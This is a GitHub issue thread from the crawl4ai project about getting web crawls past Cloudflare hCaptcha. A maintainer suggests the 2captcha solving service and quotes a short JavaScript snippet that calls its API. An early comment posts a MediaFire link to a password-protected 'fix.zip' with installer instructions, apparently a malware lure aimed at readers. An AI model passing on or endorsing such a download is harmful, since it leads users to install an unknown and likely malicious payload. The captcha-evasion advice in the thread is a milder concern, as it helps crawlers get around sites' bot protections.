### ISSUE TITLE
many sites have cloudflare captcha 

### ISSUE THREAD

**Issue by bolavefasfas** [unclecode/crawl4ai#78]
How to bypass hcaptcha

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aravindkarnam** [comment]
@bolavefasfas Crawl4ai supports **js execution**, you can see the documentation and example [here](https://crawl4ai.com/mkdocs/examples/js_execution_css_filtering/). You can use a captcha solving service like [2captcha](https://2captcha.com/), they claim to solve multiple captchas including hcaptcha by cloudflare, pricing also seems affordable. I've never used 2captcha before, from the looks of it, it appears they use human gig workers to solve these captchas and get paid.

I found the following code in this [article](https://dev.to/ugorji_simon/how-to-bypass-or-solve-a-captcha-with-javascript-2captcha-5ekk)
```
function solveCaptcha(siteKey, pageUrl){
    //make printing text easier
    let log = (text) => {console.log(text)};
    let logErr = (text) => {console.error(text)};
    //your api key
    const apiKey = "YOUR_API_KEY";
    //make a GET request to 2captcha
    fetch(`https://2captcha.com/in.php?key=${apiKey}
    &method=userrecaptcha&googlekey=${siteKey}&pageurl=${pageUrl}&json=1`)
    .then(response => response.json())
    .then(data => {
        //do something with the data
    })
    .catch(error => {
        logErr('Error:', error);
    });
}
```
Can you give this try and please post here if this helped you bypass captcha.

**Comment by unclecode** [comment]
@aravindkarnam We should add these kinds of examples to the example folder, a collection of things they can do. I’ve noticed many people have similar questions, so we can just refer them to that collection.
